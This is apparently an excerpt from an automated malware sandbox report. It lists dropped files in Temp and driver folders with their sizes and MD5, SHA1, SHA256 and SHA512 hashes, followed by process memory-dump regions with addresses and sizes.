                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\crls\c7e6bd7fe0e4965892ad706f0d2f42e88789b8041daf5b3eea9ca41785297798

                                                  Filesize

                                                  367B

                                                  MD5

                                                  9cf88048f43fe6b203cf003706d3c609

                                                  SHA1

                                                  5a9aa718eb5369d640bf6523a7de17c09f8bfb44

                                                  SHA256

                                                  4bdbe6ea7610c570bc481e23c45c38d61e8b45062e305356108fd21f384b75bb

                                                  SHA512

                                                  1d0b42f31911ec8bd8eecc333674863794cfa2b97964cb511132f01a98afd0417b35423fb12461b10a786054f144e598f17d7546a1b17acc6c7efbce5f6f619e

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\crypto_components_meta.dll

                                                  Filesize

                                                  61KB

                                                  MD5

                                                  3d9d1753ed0f659e4db02e776a121862

                                                  SHA1

                                                  031fb78fe7dc211fe9e0dc8ba0027c14e84cd07f

                                                  SHA256

                                                  b6163ec9d4825102e3d423e02fb026259a6a17e7d7696ae060ec2b0ba97f54f2

                                                  SHA512

                                                  e1f50513db117c32505944bfb19fd3185b3231b6bd9f0495942bd9e80dd0f54ab575f1a2fca5e542174d3abe4106a9b5448d924c690e8548cd43aa77f6497c92

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\dbghelp.dll

                                                  Filesize

                                                  1.2MB

                                                  MD5

                                                  4003e34416ebd25e4c115d49dc15e1a7

                                                  SHA1

                                                  faf95ec65cde5bd833ce610bb8523363310ec4ad

                                                  SHA256

                                                  c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

                                                  SHA512

                                                  88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\dblite.dll

                                                  Filesize

                                                  703KB

                                                  MD5

                                                  98b1a553c8c5944923814041e9a73b73

                                                  SHA1

                                                  3e6169af53125b6da0e69890d51785a206c89975

                                                  SHA256

                                                  6fc0104817caa1337531c9d8b284d80052770051efb76e5829895a3854ebaec8

                                                  SHA512

                                                  8ee4467bce6495f492895a9dfaedaf85b76d6d1f67d9ff5c8c27888191c322863bc29c14ae3f505336a5317af66c31354afaeb63127e7e781f5b249f1c967363

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\dumpwriter.dll

                                                  Filesize

                                                  409KB

                                                  MD5

                                                  f56387639f201429fb31796b03251a92

                                                  SHA1

                                                  23df943598a5e92615c42fc82e66387a73b960ff

                                                  SHA256

                                                  e7eefcf569d98a5fb14a459d949756dc00faf32ed6bda1233d9d2c79ca11531c

                                                  SHA512

                                                  7bfce579b601408262c0edd342cb2cb1ef1353b6b73dce5aad540eb77f56d1184f71c56ea859bc4373aac4875b8861e2cc5d9c49518e6c40d0b2350a7ab26c0e

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\instrumental_services.dll

                                                  Filesize

                                                  3.4MB

                                                  MD5

                                                  c6acd1d9a80740f8a416b0a78e3fa546

                                                  SHA1

                                                  7ea7b707d58bde0d5a14d8a7723f05e04189bce7

                                                  SHA256

                                                  db8acd14ace6d4c8d4d61016debe3c0d72677416661caf0d36e7306ed020920f

                                                  SHA512

                                                  46c889f4d84e2f8dc8bfd5bdc34a346aa393fc49adcbe95bc601e6d970599f579e5cb057196061c280cbfa976989c960ac2f1830fd61c0a9166f09a6c088c20d

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\key_value_storage.dll

                                                  Filesize

                                                  158KB

                                                  MD5

                                                  9bf7f895cff1f0b9ddf5fc077bac314c

                                                  SHA1

                                                  7e9c0ce6569c6f12c57f34597b213cd4d8f55e68

                                                  SHA256

                                                  d03e0af01fbcd9ce714caf3db5ca2ab3ca4a717d5fda5c99b77e09b5672498a4

                                                  SHA512

                                                  d416cfa9446e6c92f0805278c744cf9f8ac6a2bfb96a6e0b2d65e701472ea6feaf5742ed6cef833555188a95c613499e7e14cfe5788427ec2616cfd723021a67

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\klmd.sys

                                                  Filesize

                                                  368KB

                                                  MD5

                                                  990442d764ff1262c0b7be1e3088b6d3

                                                  SHA1

                                                  0b161374074ef2acc101ed23204da00a0acaa86e

                                                  SHA256

                                                  6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                  SHA512

                                                  af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\klsl.sys

                                                  Filesize

                                                  87KB

                                                  MD5

                                                  a69adedb0d47cfb23f23a9562a4405bc

                                                  SHA1

                                                  9e70576571a15aaf71106ea0cd55e0973ef2dd15

                                                  SHA256

                                                  31eaa7f1f9872c63091f4b3ec5310686b1dd1e2123af17991a6b4679eda3f62d

                                                  SHA512

                                                  77abb4435d8d445f7a29cdb8a318486a96122b5cc535da7a63da0fa920980e6ad73e78b72552f6949e66b349bbdc9aa9ea202481046e478c2829c155a1045820

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\settings.kvdb

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  173eee6007354de8cd873f59ffca955f

                                                  SHA1

                                                  395c5a7cb10d62cc4c63d2d65f849163e61cba5a

                                                  SHA256

                                                  17dfcf78dca415e3e7afac7519db911c0a93f36388c948aba40bcaa3176589a1

                                                  SHA512

                                                  465394c349dc74fd8a5c5ce5a89d65f0b0e09432d54517ea12de2bc8ccb329629dde03b0939800d30d008bedf0dca948fd84593bab7b7c8994ba041a7af1af2a

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\storage.kvdb

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  1a3330c4f388360e4c2b0d94fb48a788

                                                  SHA1

                                                  127ad9be38c4aa491bd1bce6458f99a27c6d465b

                                                  SHA256

                                                  01b8d0d8c7114b59f159021384c8a59535f87018a6a136a276b5a297f54d776d

                                                  SHA512

                                                  1fcd1e99e35dc4ec972ab63299637322a27b471d02175d56409a3a114db6259f9cd767ac054c7a2bba075f36ab62f19c8118c3dda93e37b7deda05aa2b260553

                                                • C:\Users\Admin\AppData\Local\Temp\{d571250f-8145-4cdc-9f6a-29f78b5f2dc0}\ca3545b3-8509-42e3-acfd-493c586a5d64.cmd

                                                  Filesize

                                                  695B

                                                  MD5

                                                  21dc46b7cfc5aa7c70a9b367a7b46cce

                                                  SHA1

                                                  d56f5da4dcf267e6adafb6c52783fb8000c6b28e

                                                  SHA256

                                                  4bdac4cced029ef8fde64f93df127aa9680d25c54141497d38be64ba39b8e443

                                                  SHA512

                                                  4fa2b516ea355fb8368e877ed86603bea4ec3299909cc30b91717760be197a40b7808ad8a2d6693211369b208fe9ca970ca2525c55bcc4ddf88f2062d3306569

                                                • C:\Windows\System32\drivers\klupd_4e6f50f4a_klark.sys

                                                  Filesize

                                                  355KB

                                                  MD5

                                                  9cfe1ced0752035a26677843c0cbb4e3

                                                  SHA1

                                                  e8833ac499b41beb6763a684ba60333cdf955918

                                                  SHA256

                                                  3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                  SHA512

                                                  29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                • C:\Windows\System32\drivers\klupd_4e6f50f4a_klbg.sys

                                                  Filesize

                                                  199KB

                                                  MD5

                                                  424b93cb92e15e3f41e3dd01a6a8e9cc

                                                  SHA1

                                                  2897ab04f69a92218bfac78f085456f98a18bdd3

                                                  SHA256

                                                  ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                  SHA512

                                                  15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                • C:\Windows\System32\drivers\klupd_4e6f50f4a_mark.sys

                                                  Filesize

                                                  260KB

                                                  MD5

                                                  66522d67917b7994ddfb5647f1c3472e

                                                  SHA1

                                                  f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                  SHA256

                                                  5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                  SHA512

                                                  921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                • memory/2448-47-0x0000000000A90000-0x0000000000F30000-memory.dmp

                                                  Filesize

                                                  4.6MB

                                                • memory/2448-46-0x0000000000A90000-0x0000000000F30000-memory.dmp

                                                  Filesize

                                                  4.6MB

                                                • memory/2508-137-0x0000014FFDC70000-0x0000014FFDCE1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2508-170-0x0000014FFDC70000-0x0000014FFDCE1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2508-129-0x0000000000130000-0x0000000000132000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2508-130-0x0000014FFDC70000-0x0000014FFDCE1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2508-139-0x0000014FFDC70000-0x0000014FFDCE1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2508-138-0x0000014FFDC70000-0x0000014FFDCE1000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/2520-17-0x0000000000F50000-0x000000000141C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/2520-4-0x0000000000F50000-0x000000000141C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/2520-3-0x0000000000F50000-0x000000000141C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/2520-2-0x0000000000F51000-0x0000000000F7F000-memory.dmp

                                                  Filesize

                                                  184KB

                                                • memory/2520-1-0x0000000077C84000-0x0000000077C86000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/2520-0-0x0000000000F50000-0x000000000141C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/2632-140-0x000001A25A8B0000-0x000001A25A8D2000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/4112-18222-0x0000000000400000-0x0000000000CE3000-memory.dmp

                                                  Filesize

                                                  8.9MB

                                                • memory/4112-169-0x0000000000400000-0x0000000000CE3000-memory.dmp

                                                  Filesize

                                                  8.9MB

                                                • memory/4468-126-0x0000000000400000-0x0000000000681000-memory.dmp

                                                  Filesize

                                                  2.5MB

                                                • memory/5000-82-0x0000000000400000-0x0000000000466000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/5000-81-0x0000000000400000-0x0000000000466000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/5520-65-0x00000000053C0000-0x000000000545C000-memory.dmp

                                                  Filesize

                                                  624KB

                                                • memory/5520-18228-0x0000000006D90000-0x0000000007334000-memory.dmp

                                                  Filesize

                                                  5.6MB

                                                • memory/5520-18227-0x0000000006740000-0x00000000067D2000-memory.dmp

                                                  Filesize

                                                  584KB

                                                • memory/5520-63-0x0000000000400000-0x000000000040E000-memory.dmp

                                                  Filesize

                                                  56KB

                                                • memory/5520-18211-0x0000000005C00000-0x0000000005C66000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/5520-64-0x0000000000400000-0x000000000040E000-memory.dmp

                                                  Filesize

                                                  56KB

                                                • memory/5552-199-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-198-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-200-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-201-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-202-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-195-0x0000000140000000-0x000000014043E000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/5552-203-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-204-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5552-197-0x0000000000820000-0x00000000009A8000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/5876-185-0x0000000000400000-0x00000000008BB000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5876-23-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/5876-194-0x0000000000400000-0x00000000008BB000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5876-28-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/5876-18223-0x0000000000400000-0x00000000008BB000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5876-24-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/5876-25-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/5876-27-0x0000000000ED1000-0x0000000000EFF000-memory.dmp

                                                  Filesize

                                                  184KB

                                                • memory/6076-66-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-21-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-19-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-20-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-40-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-44-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-18-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-45-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-48-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6076-108-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/6544-21126-0x00000209AD4B0000-0x00000209AD4FC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/6544-21227-0x00000209ADEB0000-0x00000209ADF04000-memory.dmp

                                                  Filesize

                                                  336KB

                                                • memory/6544-18297-0x0000020992E90000-0x0000020992F38000-memory.dmp

                                                  Filesize

                                                  672KB

                                                • memory/6544-18299-0x0000020994BE0000-0x0000020994CEA000-memory.dmp

                                                  Filesize

                                                  1.0MB

                                                • memory/6544-21125-0x00000209AD450000-0x00000209AD4A6000-memory.dmp

                                                  Filesize

                                                  344KB

                                                • memory/9496-21591-0x000000000CB10000-0x000000000CC64000-memory.dmp

                                                  Filesize

                                                  1.3MB

                                                • memory/9496-21196-0x00000000055D0000-0x0000000005636000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/9496-21145-0x0000000004F30000-0x0000000004F66000-memory.dmp

                                                  Filesize

                                                  216KB

                                                • memory/9496-21192-0x0000000005690000-0x0000000005CB8000-memory.dmp

                                                  Filesize

                                                  6.2MB

                                                • memory/9496-21195-0x0000000005510000-0x0000000005532000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/9496-21225-0x0000000005DD0000-0x0000000006124000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                • memory/9496-21595-0x0000000005270000-0x000000000528A000-memory.dmp

                                                  Filesize

                                                  104KB

                                                • memory/9496-21596-0x000000000CCB0000-0x000000000CCBA000-memory.dmp

                                                  Filesize

                                                  40KB

                                                • memory/9496-21600-0x000000000CF10000-0x000000000CF60000-memory.dmp

                                                  Filesize

                                                  320KB

                                                • memory/9496-21601-0x000000000D020000-0x000000000D0D2000-memory.dmp

                                                  Filesize

                                                  712KB

                                                • memory/9496-21602-0x000000000D2B0000-0x000000000D472000-memory.dmp

                                                  Filesize

                                                  1.8MB

                                                • memory/9496-21605-0x000000000D540000-0x000000000D58E000-memory.dmp

                                                  Filesize

                                                  312KB

                                                • memory/9496-21259-0x0000000006300000-0x000000000634C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/9496-21299-0x0000000007980000-0x0000000007A78000-memory.dmp

                                                  Filesize

                                                  992KB

                                                • memory/9496-21296-0x0000000002DF0000-0x0000000002DF8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/9496-21282-0x00000000072C0000-0x00000000072E2000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/9496-21281-0x00000000075A0000-0x0000000007636000-memory.dmp

                                                  Filesize

                                                  600KB

                                                • memory/9496-21255-0x00000000062C0000-0x00000000062DE000-memory.dmp

                                                  Filesize

                                                  120KB

                                                • memory/9496-21278-0x0000000007C20000-0x000000000829A000-memory.dmp

                                                  Filesize

                                                  6.5MB

                                                • memory/9496-21279-0x0000000006810000-0x000000000682A000-memory.dmp

                                                  Filesize

                                                  104KB

                                                • memory/10668-21582-0x0000000007CE0000-0x0000000007CE8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/10668-21534-0x0000000007BF0000-0x0000000007BFE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                • memory/10668-21326-0x0000000007810000-0x0000000007842000-memory.dmp

                                                  Filesize

                                                  200KB

                                                • memory/10668-21328-0x000000006F110000-0x000000006F15C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/10668-21343-0x0000000007860000-0x0000000007903000-memory.dmp

                                                  Filesize

                                                  652KB

                                                • memory/10668-21569-0x0000000007C00000-0x0000000007C14000-memory.dmp

                                                  Filesize

                                                  80KB

                                                • memory/10668-21377-0x0000000007A30000-0x0000000007A3A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                • memory/10668-21340-0x00000000077F0000-0x000000000780E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                • memory/10668-21508-0x0000000007BC0000-0x0000000007BD1000-memory.dmp

                                                  Filesize

                                                  68KB

                                                • memory/10668-21581-0x0000000007D00000-0x0000000007D1A000-memory.dmp

                                                  Filesize

                                                  104KB

                                                • memory/10684-25952-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/12148-23743-0x0000000000120000-0x00000000005DA000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/12148-23333-0x0000000000120000-0x00000000005DA000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/13896-18247-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB

                                                • memory/13896-18231-0x0000000000ED0000-0x000000000139C000-memory.dmp

                                                  Filesize

                                                  4.8MB